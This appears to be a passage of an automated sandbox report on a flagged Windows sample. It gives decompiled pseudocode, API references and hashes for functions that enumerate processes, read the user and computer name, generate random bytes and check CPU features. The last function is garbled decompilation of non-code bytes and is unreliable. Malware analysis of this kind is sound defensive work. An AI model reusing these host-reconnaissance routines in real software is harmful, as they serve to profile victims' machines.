                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D27B
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040D29D
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D424
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040D433
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                                                                                • String ID:
                                                                                                • API String ID: 715332099-0
                                                                                                • Opcode ID: 623ac24f0f991b9a062ca38a056801867b3058eb7de3a7201af57816754bbfca
                                                                                                • Instruction ID: 44330af9aa380f0d7c1b7aa6eb1ee91066a4386cc69fad06cd4b56d0774bd59c
                                                                                                • Opcode Fuzzy Hash: 623ac24f0f991b9a062ca38a056801867b3058eb7de3a7201af57816754bbfca
                                                                                                • Instruction Fuzzy Hash: 494150719041298BC714F7A5DC95EEDB378AF54308F1002BEF10A721E2EF789E89CA59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0041778E(void* __ecx, void* __edi, void* __eflags) {
                                                                                                				char _v8;
                                                                                                				long _v12;
                                                                                                				char _v36;
                                                                                                				char _v60;
                                                                                                				char _v92;
                                                                                                				short _v604;
                                                                                                				void* _t26;
                                                                                                				void* _t38;
                                                                                                				void* _t39;
                                                                                                
                                                                                                				_t39 = __eflags;
                                                                                                				_v8 = 0x10;
                                                                                                				_t38 = __ecx;
                                                                                                				 *0x46dea4(1,  &_v92,  &_v8);
                                                                                                				_v12 = 0x100;
                                                                                                				GetUserNameW( &_v604,  &_v12);
                                                                                                				E00403098(_t26, _t38, E004043E6(_t26,  &_v36,  &_v92, _t39, E00404260(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				return _t38;
                                                                                                			}













                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,00000037,hpg), ref: 004177AB
                                                                                                • GetUserNameW.ADVAPI32(?,00000010), ref: 004177C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID: hpg
                                                                                                • API String ID: 4229901323-1164758663
                                                                                                • Opcode ID: 3a91e7c9c85b8e38fe3e30744da5450a5ad0918e5044f29859edf51263ce7b81
                                                                                                • Instruction ID: bc3ddf2579cab3824883f85f976b1990b9072a0b54287e00b7ea6f78515a8f6d
                                                                                                • Opcode Fuzzy Hash: 3a91e7c9c85b8e38fe3e30744da5450a5ad0918e5044f29859edf51263ce7b81
                                                                                                • Instruction Fuzzy Hash: 76011271A0011DABCB14EBE1DC45ADDB7BCEF44319F10017BF905B6191EEB46B898B98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E0044B593(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				short _v248;
                                                                                                				signed int _v252;
                                                                                                				intOrPtr _v256;
                                                                                                				void* __ebp;
                                                                                                				signed int _t50;
                                                                                                				signed int _t58;
                                                                                                				signed int _t67;
                                                                                                				signed int _t69;
                                                                                                				signed int _t72;
                                                                                                				signed int _t73;
                                                                                                				intOrPtr _t75;
                                                                                                				signed int _t76;
                                                                                                				signed int _t84;
                                                                                                				signed int _t86;
                                                                                                				signed int _t87;
                                                                                                				signed int _t89;
                                                                                                				intOrPtr _t90;
                                                                                                				void* _t92;
                                                                                                				intOrPtr* _t113;
                                                                                                				void* _t117;
                                                                                                				intOrPtr* _t119;
                                                                                                				signed int _t123;
                                                                                                				signed int _t124;
                                                                                                				signed int _t125;
                                                                                                				signed int _t126;
                                                                                                				void* _t127;
                                                                                                				signed int* _t129;
                                                                                                				int _t132;
                                                                                                				signed int _t133;
                                                                                                				void* _t134;
                                                                                                
                                                                                                				_t50 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t50 ^ _t133;
                                                                                                				_t92 = E00442F68(__ebx, __ecx, __edx);
                                                                                                				_t129 =  *(E00442F68(_t92, __ecx, __edx) + 0x34c);
                                                                                                				_t132 = E0044B8BB(_a4);
                                                                                                				asm("sbb ecx, ecx");
                                                                                                				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                                                                                                					_t58 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                                                                                                					_v252 = _v252 & 0x00000000;
                                                                                                					__eflags = _t58;
                                                                                                					if(_t58 != 0) {
                                                                                                						L18:
                                                                                                						__eflags = ( *_t129 & 0x00000300) - 0x300;
                                                                                                						if(( *_t129 & 0x00000300) == 0x300) {
                                                                                                							L39:
                                                                                                							__eflags =  !( *_t129 >> 2) & 0x00000001;
                                                                                                							L40:
                                                                                                							return E00430A5B(_v8 ^ _t133);
                                                                                                						}
                                                                                                						asm("sbb ecx, ecx");
                                                                                                						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                                                						__eflags = _t67;
                                                                                                						if(_t67 != 0) {
                                                                                                							_t69 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                                                							__eflags = _t69;
                                                                                                							if(_t69 != 0) {
                                                                                                								__eflags =  *(_t92 + 0x60);
                                                                                                								if( *(_t92 + 0x60) != 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								__eflags =  *(_t92 + 0x5c);
                                                                                                								if( *(_t92 + 0x5c) == 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								_t72 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                                                								__eflags = _t72;
                                                                                                								if(_t72 != 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								_push(_t129);
                                                                                                								_t73 = E0044BA13(0, _t132, 0);
                                                                                                								__eflags = _t73;
                                                                                                								if(_t73 == 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								 *_t129 =  *_t129 | 0x00000100;
                                                                                                								__eflags = _t129[1];
                                                                                                								L37:
                                                                                                								if(__eflags == 0) {
                                                                                                									_t129[1] = _t132;
                                                                                                								}
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							 *_t129 =  *_t129 | 0x00000200;
                                                                                                							_t123 =  *_t129;
                                                                                                							__eflags =  *(_t92 + 0x60) - _t69;
                                                                                                							if( *(_t92 + 0x60) == _t69) {
                                                                                                								__eflags =  *(_t92 + 0x5c) - _t69;
                                                                                                								if( *(_t92 + 0x5c) == _t69) {
                                                                                                									goto L23;
                                                                                                								}
                                                                                                								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                                                                                                								_v256 = _t113 + 2;
                                                                                                								do {
                                                                                                									_t75 =  *_t113;
                                                                                                									_t113 = _t113 + 2;
                                                                                                									__eflags = _t75 - _v252;
                                                                                                								} while (_t75 != _v252);
                                                                                                								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                                                                                                								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                                                                                                									_t69 = 0;
                                                                                                									goto L23;
                                                                                                								}
                                                                                                								_push(_t129);
                                                                                                								_t76 = E0044BA13(_t92, _t132, 1);
                                                                                                								__eflags = _t76;
                                                                                                								if(_t76 == 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								 *_t129 =  *_t129 | 0x00000100;
                                                                                                								_t69 = 0;
                                                                                                								L24:
                                                                                                								__eflags = _t129[1] - _t69;
                                                                                                								goto L37;
                                                                                                							}
                                                                                                							L23:
                                                                                                							_t124 = _t123 | 0x00000100;
                                                                                                							__eflags = _t124;
                                                                                                							 *_t129 = _t124;
                                                                                                							goto L24;
                                                                                                						}
                                                                                                						 *_t129 = _t67;
                                                                                                						L2:
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                                                					__eflags = _t84;
                                                                                                					if(_t84 == 0) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					_t86 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                                                                                					_pop(_t117);
                                                                                                					__eflags = _t86;
                                                                                                					if(_t86 != 0) {
                                                                                                						__eflags =  *_t129 & 0x00000002;
                                                                                                						if(( *_t129 & 0x00000002) != 0) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						__eflags =  *(_t92 + 0x5c);
                                                                                                						if( *(_t92 + 0x5c) == 0) {
                                                                                                							L14:
                                                                                                							_t125 =  *_t129;
                                                                                                							__eflags = _t125 & 0x00000001;
                                                                                                							if((_t125 & 0x00000001) != 0) {
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							_t87 = E0044B9EF(_t132);
                                                                                                							__eflags = _t87;
                                                                                                							if(_t87 == 0) {
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							_t126 = _t125 | 0x00000001;
                                                                                                							__eflags = _t126;
                                                                                                							 *_t129 = _t126;
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						_t89 = E00439B0E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                                                                                                						_t134 = _t134 + 0xc;
                                                                                                						__eflags = _t89;
                                                                                                						if(_t89 != 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						 *_t129 =  *_t129 | 0x00000002;
                                                                                                						__eflags =  *_t129;
                                                                                                						_t129[2] = _t132;
                                                                                                						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                                                                                                						_t127 = _t119 + 2;
                                                                                                						do {
                                                                                                							_t90 =  *_t119;
                                                                                                							_t119 = _t119 + 2;
                                                                                                							__eflags = _t90 - _v252;
                                                                                                						} while (_t90 != _v252);
                                                                                                						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                                                                                                						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                                                                                                							_t129[1] = _t132;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *_t129 =  *_t129 | 0x00000304;
                                                                                                						_t129[1] = _t132;
                                                                                                						L17:
                                                                                                						_t129[2] = _t132;
                                                                                                					}
                                                                                                					goto L18;
                                                                                                				}
                                                                                                				L1:
                                                                                                				 *_t129 =  *_t129 & 0x00000000;
                                                                                                				goto L2;
                                                                                                			}


                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B5E7
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B638
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B6F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: fe3e842a4429e8705d7bf3d4377f0e36a023bd0f4496e12751f17e35f6674910
                                                                                                • Instruction ID: e58569e80f3c433571db9b71a7952f8bd97f974af6311f6e821d4d0979ade898
                                                                                                • Opcode Fuzzy Hash: fe3e842a4429e8705d7bf3d4377f0e36a023bd0f4496e12751f17e35f6674910
                                                                                                • Instruction Fuzzy Hash: 9B61AF716402079BFB299F25CC82BBAB7B8EF44304F1041BBE905C6685E778D981DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E0042F31F(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
                                                                                                				void* _t6;
                                                                                                				BYTE* _t9;
                                                                                                				long** _t10;
                                                                                                
                                                                                                				_t10 = __ecx;
                                                                                                				_t9 = __edx;
                                                                                                				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
                                                                                                					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
                                                                                                						CryptReleaseContext( *_t10, 0);
                                                                                                						return 0;
                                                                                                					}
                                                                                                					_push(0xffffff98);
                                                                                                					L2:
                                                                                                					_pop(_t6);
                                                                                                					return _t6;
                                                                                                				}
                                                                                                				_push(0xffffff99);
                                                                                                				goto L2;
                                                                                                			}







                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,0042EFD8,00000034,00000000,?,?), ref: 0042F334
                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,0042EFD8,00000034,00000000,?,?), ref: 0042F349
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042EFD8,00000034,00000000,?,?), ref: 0042F35B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: b9d0245aa624595b6df0c0d36c13bb58bf979b86939436b2b3159c8295bd44db
                                                                                                • Instruction ID: 87aeddbda1f256331635c560bef9dc7fe3f883f8c1c4fe2151d7c6a640be0d00
                                                                                                • Opcode Fuzzy Hash: b9d0245aa624595b6df0c0d36c13bb58bf979b86939436b2b3159c8295bd44db
                                                                                                • Instruction Fuzzy Hash: 4AF06531304224BAEB304E55FC04F573A68DBC5BA9FF00136F759D91E0D666D444965C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E004306EC(intOrPtr __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed char _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				intOrPtr _t51;
                                                                                                				signed int _t53;
                                                                                                				signed int _t56;
                                                                                                				signed int _t57;
                                                                                                				intOrPtr _t59;
                                                                                                				signed int _t60;
                                                                                                				signed int _t62;
                                                                                                				intOrPtr _t67;
                                                                                                				intOrPtr _t68;
                                                                                                				intOrPtr* _t70;
                                                                                                				intOrPtr _t76;
                                                                                                				intOrPtr _t81;
                                                                                                				intOrPtr* _t83;
                                                                                                				signed int _t84;
                                                                                                				signed int _t87;
                                                                                                
                                                                                                				_t81 = __edx;
                                                                                                				 *0x46cd0c =  *0x46cd0c & 0x00000000;
                                                                                                				 *0x46c010 =  *0x46c010 | 1;
                                                                                                				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                                					L20:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                				 *0x46c010 =  *0x46c010 | 0x00000002;
                                                                                                				 *0x46cd0c = 1;
                                                                                                				_t83 =  &_v44;
                                                                                                				_push(1);
                                                                                                				asm("cpuid");
                                                                                                				_pop(_t67);
                                                                                                				 *_t83 = 0;
                                                                                                				 *((intOrPtr*)(_t83 + 4)) = 1;
                                                                                                				 *((intOrPtr*)(_t83 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                                                                                                				_v12 = _v44;
                                                                                                				_t51 = 1;
                                                                                                				_t76 = 0;
                                                                                                				_push(1);
                                                                                                				asm("cpuid");
                                                                                                				_pop(_t68);
                                                                                                				 *_t83 = _t51;
                                                                                                				 *((intOrPtr*)(_t83 + 4)) = _t67;
                                                                                                				 *((intOrPtr*)(_t83 + 8)) = _t76;
                                                                                                				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                                                                                                				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
                                                                                                					L9:
                                                                                                					_t84 =  *0x46cd10; // 0x2
                                                                                                					L10:
                                                                                                					_v28 = _v32;
                                                                                                					_t53 = _v36;
                                                                                                					_v8 = _t53;
                                                                                                					_v24 = _t53;
                                                                                                					if(_v12 >= 7) {
                                                                                                						_t59 = 7;
                                                                                                						_push(_t68);
                                                                                                						asm("cpuid");
                                                                                                						_t70 =  &_v44;
                                                                                                						 *_t70 = _t59;
                                                                                                						 *((intOrPtr*)(_t70 + 4)) = _t68;
                                                                                                						 *((intOrPtr*)(_t70 + 8)) = 0;
                                                                                                						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
                                                                                                						_t60 = _v40;
                                                                                                						_v20 = _t60;
                                                                                                						_t53 = _v8;
                                                                                                						if((_t60 & 0x00000200) != 0) {
                                                                                                							 *0x46cd10 = _t84 | 0x00000002;
                                                                                                						}
                                                                                                					}
                                                                                                					if((_t53 & 0x00100000) != 0) {
                                                                                                						 *0x46c010 =  *0x46c010 | 0x00000004;
                                                                                                						 *0x46cd0c = 2;
                                                                                                						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
                                                                                                							asm("xgetbv");
                                                                                                							_v16 = _t53;
                                                                                                							_v12 = _t81;
                                                                                                							if((_v16 & 0x00000006) == 6 && 0 == 0) {
                                                                                                								_t56 =  *0x46c010; // 0x2f
                                                                                                								_t57 = _t56 | 0x00000008;
                                                                                                								 *0x46cd0c = 3;
                                                                                                								 *0x46c010 = _t57;
                                                                                                								if((_v20 & 0x00000020) != 0) {
                                                                                                									 *0x46cd0c = 5;
                                                                                                									 *0x46c010 = _t57 | 0x00000020;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					goto L20;
                                                                                                				}
                                                                                                				_t62 = _v44 & 0x0fff3ff0;
                                                                                                				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
                                                                                                					_t87 =  *0x46cd10; // 0x2
                                                                                                					_t84 = _t87 | 0x00000001;
                                                                                                					 *0x46cd10 = _t84;
                                                                                                					goto L10;
                                                                                                				} else {
                                                                                                					goto L9;
                                                                                                				}
                                                                                                			}





























                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00430705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-3916222277
                                                                                                • Opcode ID: 9f08225024835df3990a6cf90e4c90edfcd3b73904c5080c3b2acbd964008185
                                                                                                • Instruction ID: 456b76d3776973fc303f647ab5b95cb9742011e054d046ee5c379f2f5a7336e6
                                                                                                • Opcode Fuzzy Hash: 9f08225024835df3990a6cf90e4c90edfcd3b73904c5080c3b2acbd964008185
                                                                                                • Instruction Fuzzy Hash: 1041C3B19002049FDB18CF9AD89576ABBF4FB48314F10863BD855D7351E3B8A950CF99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043EFFF,?,00000004), ref: 00443693
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 7ddf3d13d3629e1920d14a51344600cf04258e3dd427b704043c150667c3a513
                                                                                                • Instruction ID: 080b3d49580c50e22c117b6e99cb4a48ef71976f9c5b2cdc6a5989f3a97ea209
                                                                                                • Opcode Fuzzy Hash: 7ddf3d13d3629e1920d14a51344600cf04258e3dd427b704043c150667c3a513
                                                                                                • Instruction Fuzzy Hash: C3F0F631641718F7DB11AFA19C01F6E7BA1EF44B12F11415AFC091A251CA759E209A9E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00413468(signed int __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
                                                                                                				void* _t53;
                                                                                                				signed int _t54;
                                                                                                				char _t61;
                                                                                                				void* _t62;
                                                                                                				void* _t67;
                                                                                                				signed char _t68;
                                                                                                				intOrPtr* _t72;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				signed char _t78;
                                                                                                				signed int* _t81;
                                                                                                				signed int* _t82;
                                                                                                				signed int* _t83;
                                                                                                				signed int* _t85;
                                                                                                				signed int* _t86;
                                                                                                				signed int* _t87;
                                                                                                				signed int _t94;
                                                                                                				void* _t97;
                                                                                                				void* _t98;
                                                                                                				signed int* _t100;
                                                                                                				signed int* _t103;
                                                                                                				signed int* _t104;
                                                                                                				signed int* _t105;
                                                                                                				intOrPtr* _t107;
                                                                                                				signed int* _t108;
                                                                                                				intOrPtr* _t109;
                                                                                                				void* _t113;
                                                                                                				void* _t116;
                                                                                                
                                                                                                				_t110 = __esi;
                                                                                                				_t109 = __edi;
                                                                                                				asm("scasb");
                                                                                                				 *__eax =  *__eax | __eax;
                                                                                                				_t53 = __eax + __ecx;
                                                                                                				E0040ADA8();
                                                                                                				asm("pushad");
                                                                                                				_t72 = __ebx + _t53;
                                                                                                				asm("das");
                                                                                                				 *((intOrPtr*)(__edx + 0x39)) =  *((intOrPtr*)(__edx + 0x39)) + _t72;
                                                                                                				_t76 = __ecx + 3;
                                                                                                				_t107 = __edx + _t76;
                                                                                                				_t77 = _t76 + 1;
                                                                                                				_t54 = _t53 + _t77;
                                                                                                				asm("das");
                                                                                                				_t78 = _t77 + 1;
                                                                                                				 *_t54 =  *_t54 + _t107;
                                                                                                				 *_t78 =  *_t78 ^ _t54;
                                                                                                				 *_t54 =  *_t54 << _t78;
                                                                                                				 *((intOrPtr*)(_t113 + 0x30)) =  *((intOrPtr*)(_t113 + 0x30)) + _t107;
                                                                                                				 *((intOrPtr*)(_t107 + 0x30)) =  *((intOrPtr*)(_t107 + 0x30)) + _t72;
                                                                                                				_t81 = _t78 + 3;
                                                                                                				 *((intOrPtr*)(_t81 - 0x5affbed0)) =  *((intOrPtr*)(_t81 - 0x5affbed0)) + _t54;
                                                                                                				 *_t81 =  *_t81 ^ _t54;
                                                                                                				asm("fnsave [eax]");
                                                                                                				_t82 =  &(_t81[0]);
                                                                                                				 *__edi =  *__edi + _t107;
                                                                                                				 *_t82 =  *_t82 ^ _t54;
                                                                                                				if( *_t82 < 0) {
                                                                                                					_t100 =  &(_t82[0]);
                                                                                                					 *((intOrPtr*)(_t107 + 0x1f004131)) =  *((intOrPtr*)(_t107 + 0x1f004131)) + _t54;
                                                                                                					_t68 = _t54 ^  *_t100;
                                                                                                					_t110 = __esi -  *_t107;
                                                                                                					 *((intOrPtr*)(_t68 + 0x32)) =  *((intOrPtr*)(_t68 + 0x32)) + _t107;
                                                                                                					 *((intOrPtr*)(__edi + 0x32)) =  *((intOrPtr*)(__edi + 0x32)) + _t72;
                                                                                                					_t103 =  &(_t100[0]);
                                                                                                					 *((intOrPtr*)(_t110 + 0x32)) =  *((intOrPtr*)(_t110 + 0x32)) + _t103;
                                                                                                					_t104 =  &(_t103[0]);
                                                                                                					 *((intOrPtr*)(_t72 - 0x3bffbece)) =  *((intOrPtr*)(_t72 - 0x3bffbece)) + _t107;
                                                                                                					asm("les edi, [ecx]");
                                                                                                					_t105 =  &(_t104[0]);
                                                                                                					_t107 = _t107 + _t105;
                                                                                                					_t82 =  &(_t105[0]);
                                                                                                					_t54 = (_t68 ^  *_t104) + _t107 ^  *_t82;
                                                                                                				}
                                                                                                				 *_t54 =  *_t54 + _t72;
                                                                                                				_t116 = _t113 - 1;
                                                                                                				asm("in eax, dx");
                                                                                                				_t83 =  &(_t82[0]);
                                                                                                				 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t107 + 0x34)) + _t83;
                                                                                                				 *((intOrPtr*)(_t109 + 0x34)) =  *((intOrPtr*)(_t109 + 0x34)) + _t72;
                                                                                                				_t85 =  &(_t83[0]);
                                                                                                				 *((intOrPtr*)(_t116 + _t110 + 0x41)) =  *((intOrPtr*)(_t116 + _t110 + 0x41)) + _t85;
                                                                                                				 *((intOrPtr*)(_t110 + 0x34)) =  *((intOrPtr*)(_t110 + 0x34)) + _t72;
                                                                                                				_t86 =  &(_t85[0]);
                                                                                                				 *((intOrPtr*)(_t110 + 0x357f0041)) =  *((intOrPtr*)(_t110 + 0x357f0041)) + _t86;
                                                                                                				_t87 =  &(_t86[0]);
                                                                                                				 *_t72 =  *_t72 + _t87;
                                                                                                				 *((intOrPtr*)(_t107 + 0x18004137)) =  *((intOrPtr*)(_t107 + 0x18004137)) + _t107;
                                                                                                				asm("aaa");
                                                                                                				 *((intOrPtr*)(_t109 + 0x14004137)) =  *((intOrPtr*)(_t109 + 0x14004137)) + _t107;
                                                                                                				_t61 = (_t54 ^  *_t82 ^  *_t82 ^  *_t82 ^  *_t82) - 0x33;
                                                                                                				 *0xc2004138 = _t61;
                                                                                                				asm("loop 0x3a");
                                                                                                				 *_t107 =  *_t107 + _t61;
                                                                                                				_pop(_t108);
                                                                                                				asm("out dx, al");
                                                                                                				 *_t109 =  *_t109 + _t108;
                                                                                                				 *((intOrPtr*)(_t116 + _t109)) =  *((intOrPtr*)(_t116 + _t109)) + _t72;
                                                                                                				 *((intOrPtr*)(_t116 + _t109 + 0x3cd40041)) =  *((intOrPtr*)(_t116 + _t109 + 0x3cd40041)) + _t108;
                                                                                                				_t94 =  &(_t87[1]);
                                                                                                				_t62 = _t61 + _t108;
                                                                                                				if(_t62 !=  *_t94) {
                                                                                                					 *((intOrPtr*)(_t116 + _t109 + 0x3d7a0041)) =  *((intOrPtr*)(_t116 + _t109 + 0x3d7a0041)) + _t108;
                                                                                                					_t97 = _t94 + 2;
                                                                                                					 *((intOrPtr*)(_t97 - 0x77ffbec3)) =  *((intOrPtr*)(_t97 - 0x77ffbec3)) + _t62;
